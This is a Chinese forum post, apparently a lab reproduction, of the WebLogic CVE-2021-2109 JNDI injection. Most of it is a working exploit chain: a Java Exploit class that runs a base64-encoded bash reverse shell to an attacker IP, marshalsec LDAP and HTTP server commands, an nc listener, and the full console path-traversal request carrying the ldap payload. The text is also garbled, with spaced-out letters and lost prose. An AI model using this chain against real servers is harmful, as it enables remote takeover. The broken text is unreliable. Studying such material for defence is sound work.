[20490] 2021-01-22_weblogic-CVE-2021-2109漏洞分析

文档创建者:s7ckTeam
浏览次数:15
最后更新:2025-01-18
2021-01-22_weblogic-CVE-2021-2109漏洞分析 w e b l o g i c - C V E - 2 0 2 1 - 2 1 0 9   v o i d z e r o   K h a n   2 0 2 1 - 0 1 - 2 2                 v u l h u b w e b l o g i c 使 1 4 8 8 3 访 : h t t p : / / 1 9 2 . 1 6 8 . 1 2 4 . 1 6 5 : 7 0 0 1 / c o n s o l e 访 h t t p : / / 1 9 2 . 1 6 8 . 1 2 4 . 1 6 5 : 7 0 0 1 / c o n s o l e / c s s / % 2 5 2 e % 2 5 2 e % 2 5 2 f / c o n s o l e j n d i . p o r t a l 1 j a v a b a s e 6 4 j a v a J a v a c   E x p l o i t . j a v a E x p l o i t . c l a s s w e b l a d p 使 p y t h o n p y t h o n   - m   S i m p l e H T T P S e r v e r   8 0 0 0 访 i m p o r t   j a v a . i o . B u f f e r e d R e a d e r ; i m p o r t   j a v a . i o . I n p u t S t r e a m ; i m p o r t   j a v a . i o . I n p u t S t r e a m R e a d e r ;   p u b l i c   c l a s s   E x p l o i t {     p u b l i c   E x p l o i t ( )   t h r o w s   E x c e p t i o n   {             / / P r o c e s s   p   = R u n t i m e . g e t R u n t i m e ( ) . e x e c ( n e w S t r i n g [ ] { " c m d " , " / c " , " c a l c . e x e " } ) ;         P r o c e s s   p   =   R u n t i m e . g e t R u n t i m e ( ) . e x e c ( n e w   S t r i n g [ ] { " / b i n / b a s h " , " - c " , " e c h o   Y m F z a C A t a S A + J i A v Z G V 2 L 3 R j c C 8 x O T I u M T Y 4 L j E y N C 4 x M j g v N j Y 2 N i A w P i Y x | b a s e 6 4 - d   | b a s h " } ) ;             I n p u t S t r e a m   i s   =   p . g e t I n p u t S t r e a m ( ) ;             B u f f e r e d R e a d e r   r e a d e r   =   n e w   B u f f e r e d R e a d e r ( n e w   I n p u t S t r e a m R e a d e r ( i s ) ) ;               S t r i n g   l i n e ;             w h i l e ( ( l i n e   =   r e a d e r . r e a d L i n e ( ) )   ! =   n u l l )   {                     S y s t e m . o u t . p r i n t l n ( l i n e ) ;             }               p . w a i t F o r ( ) ;             i s . c l o s e ( ) ;             r e a d e r . c l o s e ( ) ;             p . d e s t r o y ( ) ;         }       p u b l i c   s t a t i c   v o i d   m a i n ( S t r i n g [ ]   a r g s )   t h r o w s   E x c e p t i o n   {         } }
2 使 m a r s h a l s e c l a d p h t t p s : / / g i t h u b . c o m / m b e c h l e r / m a r s h a l s e c m a r s h a l s e c 使 m a v e n m v n   c l e a n   p a c k a g e   - D s k i p T e s t s     l d a p j a v a   - c p   m a r s h a l s e c - 0 . 0 . 3 - S N A P S H O T - a l l . j a r m a r s h a l s e c . j n d i . L D A P R e f S e r v e r   h t t p : / / 1 9 2 . 1 6 8 . 1 2 4 . 1 3 3 : 8 0 0 0 / # E x p l o i t   9 0 0 0 3 n c n c   - l v v p   6 6 6 6 4 e x p s h e l l E x p i p 1 9 2 . 1 6 8 . 1 2 4 ; 1 3 3   G E T   / c o n s o l e / c s s / % 2 5 2 e % 2 5 2 e % 2 5 2 f / c o n s o l e j n d i . p o r t a l ? _ p a g e L a b e l = J N D I B i n d i n g P a g e G e n e r a l & _ n f p b = t r u e & J N D I B i n d i n g P o r t l e t h a n d l e = c o m . b e a . c o n s o l e . h a n d l e s . J n d i B i n d i n g H a n d l e ( % 2 2 l d a p : / / 1 9 2 . 1 6 8 . 1 2 4 ; 1 3 3 : 9 0 0 0 / a 1 2 3 4 5 ; A d m i n S e r v e r % 2 2 )   H T T P / 1 . 1 H o s t :   1 9 2 . 1 6 8 . 1 2 4 . 1 6 5 : 7 0 0 1 U p g r a d e - I n s e c u r e - R e q u e s t s :   1 U s e r - A g e n t :   M o z i l l a / 5 . 0   ( W i n d o w s   N T   1 0 . 0 ; W O W 6 4 )   A p p l e W e b K i t / 5 3 7 . 3 6   ( K H T M L ,   l i k e   G e c k o )   C h r o m e / 7 8 . 0 . 3 9 0 4 . 1 0 8 S a f a r i / 5 3 7 . 3 6 A c c e p t : t e x t / h t m l , a p p l i c a t i o n / x h t m l + x m l , a p p l i c a t i o n / x m l ; q = 0 . 9 , i m a g e / w e b p , i m a g e / a p n g , * / * ; q = 0 . 8 , a p p l i c a t i o n / s i g n e d - e x c h a n g e ; v = b 3 A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e A c c e p t - L a n g u a g e :   z h - C N , z h ; q = 0 . 9 C o o k i e : A D M I N C O N S O L E S E S S I O N = K C 0 j q f X z n _ D y 5 s 6 j g 9 Q V T 7 9 h z z F g E p t B F k x D U Q E _ S J Y o g G p G L f P n ! - 1 6 3 2 9 2 6 4 7 5 C o n n e c t i o n :   c l o s e

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则